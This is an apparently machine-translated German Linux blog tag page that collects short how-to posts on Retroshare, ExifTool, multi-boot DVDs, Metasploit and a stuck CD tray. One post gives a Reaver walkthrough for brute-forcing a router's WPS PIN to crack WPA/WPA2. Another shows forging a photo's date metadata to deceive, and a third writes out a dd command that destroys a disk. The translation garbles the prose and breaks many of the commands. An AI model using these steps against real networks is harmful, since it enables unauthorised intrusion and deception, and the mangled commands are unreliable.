Posts Tagged 'Sicherheit'

Retroshare ist ein Cross-Plattform-Anwendung für den Austausch von Dateien über das Netzwerk F2F , die als sehr sicher, wie es mit authentifiziert GPG und Sie durch eine Verbindung herstellen SSH-Tunnel . Auf dem Gelände offiziellen gibt es fertige Pakete für verschiedene Distributionen. In dem speziellen Fall Debian, gibt es nur 32-Bit-Paket für Squeeze, da ich Sid amd64, hatte ich zu arrangieren:

wget http://ppa.launchpad.net/csoler-users/retroshare-snapshots/ubuntu/pool/main/r/retroshare/retroshare_0.5.3-0.5256~oneiric_amd64.deb

sudo dpkg-i-retroshare_0.5.3 0,5256 ~ oneiric_amd64.deb

sobald Sie anfangen, die Konfiguration ist intuitiv.

genießen ;)

Share on Tumblr http://img337.imageshack.us/img337/4888/retroshare.png Digg This Submit to reddit Aktie
Stichworte: ,

Kommentare 2 Kommentare »

Ich hatte bereits in der Vergangenheit gesprochen ExifTool , ein Werkzeug, das benutzt wird, um zu extrahieren alle EXIF-Daten aus einem Foto. Im Repo-es gibt definitiv andere Programme, um die EXIF-Daten zu bekommen, aber das ist, was ich für ein paar Jahre jetzt, und ich bekam affezzionato. In meinem Repository sind Pakete bereit:

Laden amd64

I386 herunterladen

genießen ;)

Share on Tumblr http://www.edmondweblog.com/wp-includes/images/smilies/icon_wink.gif Digg This Submit to reddit Aktie
Schlagwörter: , , ,

Kommentare Keine Kommentare »

In der letzten Zeit geschehen, USB-Sticks oder Festplatten in Fülle haben, und dann nicht in der Lage, sie zu nutzen. Manchmal verschenken oder verkaufen diese Laufwerke und als eine Frage der Sicherheit, wäre es am besten, um sicherzustellen, dass niemand macht Spaß, einige persönliche Informationen zu erinnern. Es wurde gezeigt, dass mehr als 30% aller PCs mit dem Internet verbunden ist jeden Tag, Surfen auf Porno-Seiten, Speichern von Fotos und Videos dreckig, wie funktioniert picchiopc . Das Ziel ist also für diejenigen, die in die Gewohnheiten anderer Leute gucken wollen, das Leben schwer machen :) Sobald Sie die Festplatte formatiert werden identifiziert haben, ist der Befehl einfach:

  $ Sudo dd if = / dev / zero of = / dev / sdX 

genießen ;)

Share on Tumblr http://img268.imageshack.us/img268/8607/harddiskhot.png Digg This Submit to reddit Aktie
Schlagwörter: , ,

Kommentare 18 Kommentare »

Legen Sie in einem CD / DVD oder USB-Flash-Laufwerk, mehrere Betriebssysteme, kann sehr bequem sein, sowohl in Bezug auf die Einsparungen der gleichen CD / DVD entweder, weil Sie an Ihren Fingerspitzen, alle Werkzeuge, die uns helfen können, zu lösen einige Probleme. Der andere wichtige Faktor, meiner Meinung nach, und das dieser Live CD / DVD, kann in mehreren Architekturen gebaut werden, so dass die auf ihren Festplatten haben verschiedene O: S. diferrenti und Architektur, werden Sie ein einzigartiges Werkzeug, das ihm erlauben notwendig, chroottarsi finden. multicd ist nichts anderes als ein Skript, das uns hilft, unsere eigene DVD erstellen, Ich zum Beispiel, ich habe eine DVD mutidistro, 3,8 jig, in einer 64-Bit-Debian Live, Clonezilla, Backtrack, GParted, Ultimate Boot CD errichtet.

Anforderungen:

Erhalten Sie die ISO der unterstützten Betriebssysteme :

und dann:

  $ Wget ftp://downloads.tuxfamily.org/multicd/multicd-6.8.sh 

  $ Chmod + x multicd-6.8.sh 

  # Apt-get install genisoimage 

An diesem Punkt müssen Sie die Namen der Systeme verändern heruntergeladen haben, wie auf der Website beschrieben , zum Beispiel:

 $ Mv debian-live-6.0.3-i386-gnome-desktop.iso binary.iso $ mv Clonezilla-Live-1.2.8-46-i686.iso $ clonezilla.iso usw..  usw..  usw.. 

Jetzt nur noch das Skript multicd, und warten Sie einige Minuten:

  # ./multicd-6.8.sh 

genießen ;)

Share on Tumblr http://img26.imageshack.us/img26/8687/multicd.png Digg This Submit to reddit Aktie
Schlagwörter: ,

Kommentare 13 Kommentare »

Meine sheela

Ich habe bereits in Wort der Vergangenheit von exiftool , und wie wichtig es ist, die Metadaten, die in einem Foto versteckt sind, vor der Verteilung um zu löschen. Aus Gründen, die ich nicht hier bin, um zu erklären, habe ich die Daten in den Bildern später immer überprüfen, denn es macht mir klar, mit der Hilfe von speziellen Fragen, wenn die Person, die geschickt hat auch die Wahrheit spricht. Aber wenn ich wollte bewusst lügen? zu glauben, dass das Foto in einem anderen Aufnahmedatum, und dann ein Auge zu täuschen unvorsichtig? .... wie? Ganz einfach, manipulieren die Daten mit exiftool . Als ein Beispiel, das Bild etwas Hafen "gereinigt" meiner sheela, im Jahr 2007 übernommen. Die Daten auf dem Foto sind wie folgt:

ORIGINAL:

Edmond @ Debianbox: ~ / Desktop / test $ exiftool-a-u-g1 sheela.jpg
- ExifTool -
ExifTool Versionsnummer: 8.60
- System -
Dateiname: sheela.jpg
Verzeichnis:.
Dateigröße: 189 kB
Datei-Änderungsdatum / Zeit: 2007:09:30 15.23.51 +02:00
Dateirechte: rw-r -
- Datei -
Dateiformat: JPEG
MIME-Typ: image / jpeg
Bildbreite: 500
Image Height: 375
Encoding-Prozess: Baseline DCT, Huffman-Kodierung
Bits pro Sample: 8
Farbkomponenten: 3
Y Cb Cr Sub Sampling: YCbCr4: 4.04 (1 1)
- JFIF -
JFIF Version: 1.01
Einheit Auflösung: Zoll
X Auflösung: 72
Y-Auflösung: 72
- Verbund -
Größe: 500 x 375

dann, um das Datum zu manipulieren, so dass eine Kopie des Originals, ist wie folgt der Befehl zu verwenden:

  $ Exiftool-Datetime = '2012: 01:15 14.50.04 "foto.jpg 

FAKE:

Edmond @ Debianbox: ~ / Desktop / test $ exiftool-Datetime = '2012: 01:15 14.50.04 "sheela.jpg
1 Bilddateien aktualisiert
Edmond @ Debianbox: ~ / Desktop / test $ exiftool-a-u-g1-sheela.jpg - ExifTool -
ExifTool Versionsnummer: 8.60
- System -
Dateiname: sheela.jpg
Verzeichnis:.
Dateigröße: 190 kB
Datei-Änderungsdatum / Zeit: 2012:01:15 14.50.37 +01:00
Dateirechte: rw-r -
- Datei -
Dateiformat: JPEG
MIME-Typ: image / jpeg
Exif Byte Order: Big-Endian (Motorola, MM)
Bildbreite: 500
Image Height: 375
Encoding-Prozess: Baseline DCT, Huffman-Kodierung
Bits pro Sample: 8
Farbkomponenten: 3
Y Cb Cr Sub Sampling: YCbCr4: 4.04 (1 1)
- JFIF -
JFIF Version: 1.01
Einheit Auflösung: Zoll
X Auflösung: 72
Y-Auflösung: 72
- IFD0 -
X Auflösung: 72
Y-Auflösung: 72
Einheit Auflösung: Zoll
Y Cb Cr Positionierung: Centered
- ExifIFD -
Exif-Version: 0230
Datum / Uhrzeit Original: 2012:01:15 14.50.04
Komponenten-Konfiguration: Y, Cb, Cr, -
Flashpix Version: 0100
Farbraum: sRGB
- Verbund -
Größe: 500 x 375

alle Metadaten zu löschen:

  $ Exiftool-all = foto.jpg 
 

genießen ;)

Share on Tumblr http://img542.imageshack.us/img542/622/sheela.jpg Digg This Submit to reddit Aktie
Schlagwörter: ,

Kommentare Keine Kommentare »

Reaver WPS schlägt mit einer Brute-Force-Angriff, um das Passwort WPA/WPA2 unser Netzwerk unter bestimmten Bedingungen zu entschlüsseln. Vor allem WPS-oder Wi-Fi Protected Setup ist üblich in Home-Router ist es allgemein unter wifi-Schutz entfernt. Die Schwachstelle liegt in prorpio diese Norm, weil, wenn Sie die Einfüge-Modus Stift statt der Drucktaste zu verwenden, eröffnet dies einen Fehler. Praktisch Beschuss der Router-Paket, gibt es eine Vielzahl von Informationen nützlich, um Rissbildung. In dem Netzwerk sind jedoch mehr umfassende und detaillierte Erklärungen. Zunächst müssen Sie installieren Aircrack-ng und compilarselo , da es nicht mehr in den offiziellen Paketquellen vorhanden ist, oder bekommen es von meinem Repository . Um Reaver auf Debian haben:

  $ Sudo apt-get install libsqlite3-dev libpcap0.8 - dev 

  $ Wget http://reaver-wps.googlecode.com/files/reaver-1.3.tar.gz 

  $ Tar-xvf Reaver-1.3.tar.gz 

  Reaver-1.3/src $ cd / 

  $. / Configure 

  €! 

  $ Sudo make install 

steckte die Karte in Monitor-Modus:

  # Airmon-ng wlan0 starten 

Der obige Befehl wird mon0 im Monitor-Modus erstellen

Interface-Chipsatz Treiber

wlan0 Ralink 2561 PCI rt61pci - [phy0]
(Monitor-Modus auf mon0 aktiviert)

Scannen wpa Netzwerke erkennen:

  # Walsh-i mon0 - ignore-fcs 

Angriff:

  # Reaver-i mon0-b 00:11:22:33:44:55 - dh-klein 

für andere Befehle, um die Dokumentation in der Verpackung zu lesen.

genießen ;)

Share on Tumblr http://img600.imageshack.us/img600/4707/reaverwps.jpg Digg This Submit to reddit Aktie
Schlagwörter: , , ,

Kommentare 11 Kommentare »

Metasploit-Projekt ist ein Projekt der Computersicherheit , das Informationen zu den Sicherheitsanfälligkeiten Penetrationstests vereinfacht und hilft bei der Entwicklung von Intrusion-Detection-Systeme bietet. Das bekannteste Teilprojekt ist das Metasploit Framework ein Werkzeug zur Entwicklung und Ausführung nutzen gegen eine Remote-Maschine. Andere wichtige Teilprojekte sind die Opcode-Datenbank, das Archiv der Shellcode -und Sicherheitsforschung ( Wikipedia ) Es gibt verschiedene Linux-Distributionen, die mit der Prüfung der Sicherheit eines Systems, von denen der bekannteste ist befassen Backtrack . Aber wir können Metasploit auf unserer Lieblings-Distribution auch installieren, in diesem Fall Debian Squeeze.

Anforderungen:

# apt-get install build-essential subversion ruby libruby irb rdoc libyaml-ruby libzlib-ruby libopenssl-ruby libdl-ruby libreadline-ruby libiconv-ruby rubygems sqlite3 libsqlite3-ruby libsqlite3-dev

Installation:

$ svn co http://metasploit.com/svn/framework3/trunk/ metasploit

$ cd metasploit

$ svn up

beginnen im Konsolenmodus:

$ ./msfconsole

Drücken Sie, um Hilfe für weitere Befehle anzuzeigen. Für den Moment werde ich hier aufhören, und zwar in einer der nächsten Führung nicht aus, weiterhin mit Beispielen der Nutzung.

genießen ;)

Share on Tumblr http://img254.imageshack.us/img254/3883/metasploitp.png Digg This Submit to reddit Aktie
Schlagwörter: , ,

Kommentare 6 Kommentare »

Für mich kommt es oft vor, dass ich die Tür zu dem CD-ROM zu blockieren und somit können Sie die CD / DVD nicht auswerfen, kann dies auf die schlechte Qualität der einer CD ab, die vielleicht rw verwendet eine unendliche Anzahl von Zeiten. In dieser Situation, 98 von 100 Fällen muss man sogar als eine neu zu starten:

$ Eject / dev/cdrom0

nicht auszustoßen, dann wird die Lösung mit dem Türschloss CDROM deaktivieren:

# Echo 0> / proc / sys / dev / cdrom / autoclose

# Echo 0> / proc / sys / dev / cdrom / lock

bis zur endgültigen Änderungen vornehmen:

# Nano / etc / sysctl.conf

und setzen:

dev.cdrom.autoclose = 0
dev.cdrom.lock = 0

Share on Tumblr Save on Delicious Digg This Submit to reddit Aktie
Schlagwörter: , , ,

Kommentare Keine Kommentare »